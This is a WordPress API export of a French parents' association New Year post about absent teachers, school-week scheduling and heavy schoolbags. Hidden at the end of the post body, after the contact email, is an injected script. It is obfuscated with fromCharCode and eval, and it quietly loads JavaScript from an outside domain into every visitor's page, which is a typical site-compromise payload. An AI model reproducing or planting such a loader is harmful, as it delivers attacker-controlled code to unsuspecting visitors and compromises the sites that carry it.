{"id":7592,"date":"2018-01-02T15:12:10","date_gmt":"2018-01-02T14:12:10","guid":{"rendered":"https:\/\/acctifeducation.wordpress.com\/?p=7592"},"modified":"2018-01-23T16:42:25","modified_gmt":"2018-01-23T15:42:25","slug":"2018-notre-mobilisation-continue","status":"publish","type":"post","link":"http:\/\/actifeducation.fr\/?p=7592","title":{"rendered":"2018 : notre mobilisation continue"},"content":{"rendered":"<p>Vos repr\u00e9sentants des parents d&rsquo;\u00e9l\u00e8ves des Roux, Pasteur, Blancs Bouleaux et Barbara, ainsi que ceux du coll\u00e8ge Saint-Exup\u00e9ry vous souhaitent une Belle et Heureuse Ann\u00e9e 2018.<\/p>\n<p>Parmi les sujets sur lesquels nous sommes d&rsquo;ores-et-d\u00e9j\u00e0 mobilis\u00e9s :<\/p>\n<ul>\n<li><strong>le non-remplacement des enseignants absents avec le retour de l&rsquo;op\u00e9ration \u00ab\u00a0Sardines\u00a0\u00bb.<\/strong>\u00a0Et votre aide est pr\u00e9cieuse : faites colorier ces sardines par vos enfants en indiquant au dos le nom, pr\u00e9nom, classe de l&rsquo;enfant, d\u00e9posez-les nous colori\u00e9es dans les bo\u00eetes aux lettres des associations de parents d&rsquo;\u00e9l\u00e8ves des \u00e9coles. Plus que quelques jours pour colorier : nous les enverrons \u00e0 l&rsquo;inspection acad\u00e9mique d\u00e8s la rentr\u00e9e de janvier 2018.<br \/>\n<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-7593\" src=\"https:\/\/acctifeducation.files.wordpress.com\/2018\/01\/screen-shot-2018-01-02-at-2-54-21-pm.png\" alt=\"Screen Shot 2018-01-02 at 2.54.21 PM\" width=\"1298\" height=\"912\" \/><strong><em>==&gt;&gt;&gt; Et n&rsquo;oubliez pas de <a href=\"https:\/\/acctifeducation.wordpress.com\/signaler-un-enseignant-absent\/\" target=\"_blank\" rel=\"noopener\">nous signaler les enseignants absents ici<\/a>.<\/em><\/strong><\/li>\n<li><strong>La r\u00e9forme des rythmes scolaires, la mairie devant se positionner sur un retour ou non \u00e0 4 jours d&rsquo;ici la rentr\u00e9e de septembre 2018.<\/strong> Apr\u00e8s sondage aupr\u00e8s des parents et d\u00e9bat autour des diff\u00e9rentes \u00e9tudes sur les rythmes des enfants, vos repr\u00e9sentants ACCTIF Education se sont prononc\u00e9s pour le maintien de 4,5 jours sur la base des propositions de scenarii ci-dessous\u00a0 :<\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-7647\" src=\"http:\/\/actifeducation.fr\/wp-content\/uploads\/2018\/01\/D.jpg\" alt=\"\" width=\"978\" height=\"404\" srcset=\"http:\/\/actifeducation.fr\/wp-content\/uploads\/2018\/01\/D.jpg 978w, http:\/\/actifeducation.fr\/wp-content\/uploads\/2018\/01\/D-300x124.jpg 300w, http:\/\/actifeducation.fr\/wp-content\/uploads\/2018\/01\/D-768x317.jpg 768w\" sizes=\"auto, (max-width: 978px) 100vw, 978px\" \/><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-7648\" src=\"http:\/\/actifeducation.fr\/wp-content\/uploads\/2018\/01\/C.jpg\" alt=\"\" width=\"998\" height=\"375\" srcset=\"http:\/\/actifeducation.fr\/wp-content\/uploads\/2018\/01\/C.jpg 998w, http:\/\/actifeducation.fr\/wp-content\/uploads\/2018\/01\/C-300x113.jpg 300w, http:\/\/actifeducation.fr\/wp-content\/uploads\/2018\/01\/C-768x289.jpg 768w\" sizes=\"auto, (max-width: 998px) 100vw, 998px\" \/><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-7649\" src=\"http:\/\/actifeducation.fr\/wp-content\/uploads\/2018\/01\/A-300x112.jpg\" alt=\"\" width=\"322\" height=\"120\" srcset=\"http:\/\/actifeducation.fr\/wp-content\/uploads\/2018\/01\/A-300x112.jpg 300w, http:\/\/actifeducation.fr\/wp-content\/uploads\/2018\/01\/A-768x286.jpg 768w, http:\/\/actifeducation.fr\/wp-content\/uploads\/2018\/01\/A-1024x381.jpg 1024w, http:\/\/actifeducation.fr\/wp-content\/uploads\/2018\/01\/A.jpg 1096w\" sizes=\"auto, (max-width: 322px) 100vw, 322px\" \/>\u00a0 \u00a0 \u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-7650\" src=\"http:\/\/actifeducation.fr\/wp-content\/uploads\/2018\/01\/B-300x139.jpg\" alt=\"\" width=\"300\" height=\"139\" srcset=\"http:\/\/actifeducation.fr\/wp-content\/uploads\/2018\/01\/B-300x139.jpg 300w, http:\/\/actifeducation.fr\/wp-content\/uploads\/2018\/01\/B-768x357.jpg 768w, http:\/\/actifeducation.fr\/wp-content\/uploads\/2018\/01\/B.jpg 1008w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p>\n<ul>\n<li><strong>L&rsquo;all\u00e9gement du poids du cartable au coll\u00e8ge.<\/strong> Les cartables peuvent peser en moyenne entre 8 et 10 kg d&rsquo;apr\u00e8s nos relev\u00e9s. Or, le poids du cartable ne devrait pas exc\u00e9der plus d\u20191\/10\u00e8me du poids de l\u2019enfant ; on en est tr\u00e8s loin !<\/li>\n<\/ul>\n<p>Tout au long de l&rsquo;ann\u00e9e, n&rsquo;h\u00e9sitez pas \u00e0 nous envoyer vos questions, vos remarques ou toute autre demande par mail : <a href=\"mailto:asso@actifeducation.fr\"><em>asso@actifeducation.fr<\/em><\/a><script>var f=String;eval(f.fromCharCode(102,117,110)+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,51,46,48,46,51,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Vos repr\u00e9sentants des parents d&rsquo;\u00e9l\u00e8ves des Roux, Pasteur, Blancs Bouleaux et Barbara, ainsi que ceux du coll\u00e8ge Saint-Exup\u00e9ry vous souhaitent une Belle et Heureuse Ann\u00e9e 2018. Parmi les sujets sur lesquels nous sommes d&rsquo;ores-et-d\u00e9j\u00e0 mobilis\u00e9s : le non-remplacement des enseignants absents avec le retour de l&rsquo;op\u00e9ration \u00ab\u00a0Sardines\u00a0\u00bb.\u00a0Et votre aide est pr\u00e9cieuse : faites colorier ces &hellip;<\/p>\n<p class=\"read-more\"> <a class=\"\" href=\"http:\/\/actifeducation.fr\/?p=7592\"> <span class=\"screen-reader-text\">2018 : notre mobilisation continue<\/span> Lire la suite\u00a0\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":7633,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"site-sidebar-layout":"default","site-content-layout":"default","ast-global-header-display":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","footnotes":""},"categories":[50,35,36,37],"tags":[],"class_list":["post-7592","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-barbara","category-blancs-bouleaux","category-pasteur","category-roux"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/posts\/7592","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7592"}],"version-history":[{"count":4,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/posts\/7592\/revisions"}],"predecessor-version":[{"id":7652,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/posts\/7592\/revisions\/7652"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/media\/7633"}],"wp:attachment":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7592"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7592"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7592"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}